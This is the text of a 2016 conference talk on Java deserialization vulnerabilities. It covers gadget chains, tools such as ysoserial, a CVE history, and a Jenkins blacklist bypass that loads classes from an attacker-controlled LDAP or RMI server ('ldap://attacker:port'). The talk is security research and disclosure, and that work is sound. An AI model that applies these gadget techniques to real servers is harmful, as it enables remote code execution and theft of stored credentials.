The document discusses Java deserialization vulnerabilities. It begins with an introduction to Java's object serialization protocol and how it can be exploited if not implemented securely. Several real-world examples of vulnerabilities are provided from 2006 to 2015. Common techniques for finding vulnerabilities like grepping for "readObject()" and exploiting them using "gadgets" are described. The document concludes with a hands-on example of exploiting a Jenkins vulnerability using a custom serialized object.

1. Java Deserialization Vulnerabilities
– The Forgotten Bug Class
Matthias Kaiser
(@matthias_kaiser)

2. About me
 Head of Vulnerability Research at Code White in Ulm, Germany
 Dev for defense company in the past
 Spent a lot of time on (server-side) Java Security
 Found bugs in products of Oracle, VMware, IBM, SAP, Symantec, Apache, Adobe, HP, etc.
 Recently looking more into the Windows world and client-side stuff
@matthias_kaiser
11.11.2016 2

3. Agenda
 Introduction
 Java’s Object Serialization
 What’s the problem with it
 A history of bugs
 Finding and exploiting
 Code White’s bug parade
 A hands-on example
 More to come?
11.11.2016 3

4. Should you care?
 If your client is running server products of
you SHOULD!
11.11.2016 4

5. Some facts
 The bug class exists for more than 10 years
 Most ignored bug class in the server-side Java world until 2015
 A easy way to get reliable RCE on a server
 Architecture independent exploitation
 With Java deserialization vulnerabilities you can pwn a corp easily!
11.11.2016 5

6. Where is it used
 Several J2EE/JEE core technologies rely on serialization
 Remote Method Invocation (RMI)
 Java Management Extension (JMX)
 Java Message Service (JMS)
 Java Server Faces implementations (ViewState)
 Communication between JVMs in general (because devs are lazy :-)
 Custom application protocols running on top of http, etc.
11.11.2016 6

7. What is serialization?
Object
File
Network
Database
ObjectStream of bytes Stream of bytes
Serialization Deserialization
11.11.2016 7

8. Overview of Java’s Object Serialization Protocol
Magic
class name
field type
class field
Class description info
TC_OBJECT
TC_CLASSDESC
classdata[]
11.11.2016 8

9. There is protocol spec and a grammar
https://docs.oracle.com/javase/8/docs/platform/serialization/spec/protocol.html
11.11.2016 9

10. Deserializing an object
What could possibly go wrong here?
11.11.2016 10

11. What’s the problem
 ObjectInputStream doesn’t include validation features in its API
 All serializable classes that the current classloader can locate and load can get deserialized
 Although a class cast exception might occur in the end, the object will be created!
11.11.2016 11

12. What’s the problem #2
 A developer can customize the (de)-serialization of a serializable class
 Implement methods writeObject(), writeReplace(), readObject() and readResolve()
 ObjectInputStream invokes readObject() and readResolve()
Under our control!
11.11.2016 12

13. What’s the problem #3
 Further methods can be triggered by using certain classes as a "trampoline"
 Object.toString() using e.g. javax.management.BadAttributeValueExpException
 Object.hashCode() using e.g. java.util.HashMap
 Comparator.compare() using e.g. java.util.PriorityQueue
 etc.
Trampoline
class
Target
class
11.11.2016 13

14. What’s the problem #3
javax.management.BadAttributeValueExpException
1. Reading the field "val"
2. Calling "toString()" on "val"
11.11.2016 14

15. History of Java deserialization vulnerabilities
JRE vulnerabilities
(DoS)
Mark Schönefeld
2006
JSF Viewstate
XSS/DoS
Sun Java Web Console
Luca Carretoni
2008
CVE-2011-2894
Spring Framework RCE
Wouter Coekaerts
CVE-2012-4858
IBM Cognos Business
Intelligence RCE
Pierre Ernst
2011 2012
11.11.2016 15

16. History of Java deserialization vulnerabilities
CVE-2013-1768 Apache OpenJPA RCE
CVE-2013-1777 Apache Geronimo 3 RCE
CVE-2013-2186 Apache commons-fileupload RCE
Pierre Ernst
CVE-2015-3253 Groovy RCE
CVE-2015-7501 Commons-Collection RCE
Gabriel Lawrence and Chris Frohoff
CVE-2013-2165 JBoss RichFaces RCE
Takeshi Terada
2013 2015
11.11.2016 16

17. #JavaDeser is new hotness …
11.11.2016 17

18. Finding is trivial
 Do the "grep" thing on "readObject()"
11.11.2016 18

19. Finding is trivial
 Use an IDE like Intellij or Eclipse and trace the call paths to ObjectInputStream.readObject()
11.11.2016 19

20. Exploitation
 Exploitation requires a chain of serialized objects triggering interesting functionality e.g.
 writing files
 dynamic method calls using Java’s Reflection API
 etc.
 For such a chain the term "gadget" got established
 Chris Frohoff and others found several gadgets in standard libs
11.11.2016 20

21. Javassist/Weld Gadget
 Gadget utilizes JBoss’ Javassist and Weld framework
 Reported to Oracle with the Weblogic T3 vulnerability
 Works in Oracle Weblogic and JBoss EAP
 Allows us to call a method on a deserialized object
11.11.2016 21

22. "Return of the Rhino"-Gadget
 Gadget utilizes Rhino Script Engine of Mozilla
 Works with latest Rhino in the classpath
 Oracle applied some hardening to its Rhino version
 So only works Oracle JRE <= jre7u13 
 Works with latest openjdk7-JRE (e.g. on Debian, Ubuntu) 
 Allows us to call a method on a deserialized object
 JRE Gadget 
11.11.2016 22

23. What to look for?
 Look for methods in serializable classes
 working on files
 triggering reflection (invoking methods, getting/setting properties on beans)
 doing native calls
 etc.
AND being called from
 readObject()
 readResolve()
 toString()
 hashCode()
 finalize()
 any other method being called from a "Trampoline" class
11.11.2016 23

24. What to look for?
 Look at serializable classes used in Java reflection proxies
 java.lang.reflect.InvocationHandler implementations
 javassist.util.proxy.MethodHandler implementations
InvocationHandlerInterface
Proxy
toString() invoke (…) // do smth
invoke (target, toString, args)
11.11.2016 24

25. What to look for?
Prints out method being called
11.11.2016 25

26. What to look for?
What if InvocationHandler.invoke()
does "insecure stuff" using values from
the serialized object input stream?
Proxy
11.11.2016 26

27. Making gadget search easier
 Chris Frohoff released a tool for finding gadgets using a graph database
 Using object graph queries for gadget search
11.11.2016 27

28. Exploitation tricks
 Adam Gowdiak’s TemplatesImpl
 com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl is serializable
 Allows to define new classes from your byte[ ][ ]
 Calling TemplatesImpl.newTransformer() on deserialized object  Code Execution
11.11.2016 28

29. Exploitation tricks
 InitialContext.lookup()
 @benmmurphy used it for a sandbox escape (CVE-2013-5830)
 @zerothoughts published a gadget in Spring’s JtaTransactionManager recently
 Triggers InitialContext.lookup(jndiName)
 Uses "rmi://yourFakeRmiServer/Object" as jndiName
 Loads classes from your fake RMI server
 Calling JdbcRowSetImpl.execute() on a deserialized object will do the same 
11.11.2016 29

30. Payload generation
 Chris Frohoff released the great tool "ysoserial"
 Makes creation of payloads easy
 Includes gadgets for
 Commons Collection 3 & 4
 Spring
 Groovy
 JRE7 (<= jre7u21)
 Commons BeanUtils
 and even more!
11.11.2016 30

31. Custom payloads
 I wouldn’t go for Runtime.getRuntime().exec(cmd) for several reasons
 Most of the gadgets don’t touch the disk 
 With scripting languages your life gets even easier
 Use what’s in the classpath
 Javascript (Rhino, Nashorn)
 Groovy
 Beanshell
 etc.
11.11.2016 31

32. Code White’s Bug Parade #1
 CVE-2015-6554 - Symantec Endpoint Protection Manager RCE
 CVE-2015-6576 - Atlassian Bamboo RCE
 CVE-2015-7253 - Commvault Edge Server RCE
 CVE-2015-7253 - Apache ActiveMQ RCE
 CVE-2015-4582 - Oracle Weblogic RCE
 CVE-2016-1998 - HP Service Manager RCE
 CVE-2016-2173 - Spring AMQP RCE
 CVE-2016-3493 - Oracle Hyperion RCE
 CVE-2016-3551 - Oracle Weblogic RCE
 CVE-2016-3551 - Oracle Weblogic RCE
11.11.2016 32

33. Code White’s Bug Parade #2
 NOT-FIXED - IBM WebSphere MQ JMS client RCE
 NOT-FIXED - IBM WebSphere JMS Client RCE
 NOT-FIXED - Pivotal RabbitMQ JMS client RCE
 NOT-FIXED - Oracle OpenMQ JMS client RCE
 CVE-2016-4978 - Apache ActiveMQ Artemis JMS client RCE
 CVE-2016-4974 - Apache Qpid client/JMS client RCE
 CVE-2016-0638 - Oracle Weblogic JMS client RCE
 FIXED-NO-CVE - IIT Software SwiftMQ JMS client RCE
 MAYBE-FIX - Amazon SQS Java Messaging RCE
 WONT-FIX - JBOSS HornetQ JMS client RCE
11.11.2016 33

34. A hands-on example
11.11.2016 34

35. Jenkins
11.11.2016 35

36. Jenkins
11.11.2016 36

37. Jenkins
 Open Source Automation Server / Continous Integration Server / "Build"-Server
 Created by Kohsuke Kawaguchi (Ex-Oracle, now CTO of CloudBees)
 Fork of Oracle’s Hudson CI server
 Supports Subversion, Git, Mecurial, etc.
 Runs Maven, Ant, etc.
 More than 1200 plugins! (see https://updates.jenkins-ci.org/download/plugins/)
11.11.2016 37

38. Jenkins
 Nice target because Jenkins
 has access to Source Code repositories
 creates deployment artefacts (Jar, War, Ear, etc.)
 can deploy artefacts on target servers
 stores credentials (user/password, SSH keys)
11.11.2016 38

39. Jenkins Internals
 Jenkins uses an extra port for the Command Line Interface (CLI)
 Can be configured to a fixed or random port
11.11.2016 39

40. Jenkins Internals
 Jenkins uses an own RMI protocol for it’s Command Line Interface (CLI)
 Base64-encoded serialized objects (rO0 0xac,0xed)
11.11.2016 40

41. Jenkins under Attack
 Jenkins CLI endpoint suffered from several vulnerabilities
 CVE-2015-8103 of Steven Breen using Commons Collections gadget
 Jenkins introduced a blacklist to filter gadget classes
 CVE-2016-0788 of Moritz Bechler bypassing the blacklist (see ERNW blog post
https://insinuator.net/2016/07/jenkins-remoting-rce-ii-the-return-of-the-ysoserial/)
 As we all know blacklisting is hard because you never know …
11.11.2016 41

42. Jenkins’ Blacklist
11.11.2016 42

43. Finding a blacklist filter bypass
 How to bypass a gadget blacklist filter?
a) Find a new gadget
b) Find a bypass gadget (see Alvaro’s and Christian’s Research)
c) Look for partially fixed gadget
 After looking at all gadgets of ysoserial and matching them with Jenkin’s third-party libs and
the blacklist I found one interesting gadget discovered by Moritz Bechler:
11.11.2016 43

44. The JSON1 gadget
 "Code execution step"
 filtered by blacklist 
 "Trigger step"
 invokes all "getter" methods on
a serialized object
 Not filtered by blacklist 
 "Init step"
11.11.2016 44

45. Finding a blacklist filter bypass #1
 Initial idea was to use the JDBCRowSetImpl trick as code execution step
 "Getter"-methods trigger JNDI call:
 But net.sf.json.JSONObject.containsValue(JDBCRowSetImpl-instance) fails because several
"Getter"-methods trigger Exceptions 
11.11.2016 45

46. Finding a blacklist filter bypass #2
 Next idea was to look for other serializable classes with "Getter"-Methods leading to code
execution
 Recent research FTW:
11.11.2016 46

47. Finding a blacklist filter bypass #2
 JNDI lookups can lead to RCE (see JDBCRowSetImpl)
 Exploitation using RMI, LDAP and CORBA
 LDAP queries can lead to RCE
 LDAP server needs to be under your control
 data from LDAPresponse is deserialized using ObjectInputStream
 data (URLs) from LDAP response is used to load classes using URLClassLoader -> RCE
 I found some nice classes in package „com.sun.jndi.ldap"
 One of it is the serializable class "com.sun.jndi.ldap.LdapAttribute"
11.11.2016 47

48. com.sun.jndi.ldap.LdapAttribute
baseCtxURL=ldap://attacker:port
rdn="dc=whatever"
11.11.2016 48

49. Putting all together for the new JSON2 gadget
11.11.2016 49
 With LdapAttribute.getAttributeDefinition() we get Code Execution using a custom LDAP server
 The "Init-Step" shown before doesn’t work, so we need something else 
 By using Eclipse an alternative code path can be easily found 

50. Some "updates" with regards to exploitation …
 Previous research only mentioned the CLI port!
 If you have Jenkins running on the internet with firewall / reverse proxy, you can’t connect
 But the Jenkins Wiki has some hidden gems for us:
Connection mechanism
1. Jenkins CLI clients and Jenkins server establishes the communication in the following fashion.
Jenkins listens on a TCP/IP port configured under "TCP port for JNLP agents" in the system
configuration page. This single port is used for both agents and CLI.
…
5. If that fails (for example, if there's a reverse proxy and Jenkins runs on a different host, or if a
firewall blocks access to this TCP/IP port), or if the header is not found, it will fall back to the
communication mechanism that uses two simultaenous HTTP connections.
11.11.2016 50

51. Jenkins CLI HTTP "fallback"
11.11.2016 51
 HTTP Connection #1
 Server  Client channel
 Client reads from InputStream
 UUID as identifier
 Blocks until #2 connects
 HTTP Connection #2
 Client  Server channel
 Client writes to OutputStream
 UUID as identifier

52. Jenkins - 2.19.2 LTS
DEMO
11.11.2016 52

53. Jenkins - 2.19.2 LTS
11.11.2016 53

54. Jenkins - 2.19.2 LTS
11.11.2016 54

55. Conclusion
 Java Deserialization is no rocket science
 Finding bugs is trivial, exploitation takes more
 So many products affected by it
 Research has started, again …
 This will never end!
11.11.2016 55

56. Q&A
11.11.2016 56

57. Java Deserialization Vulnerabilities
– The forgotten bug class
Matthias Kaiser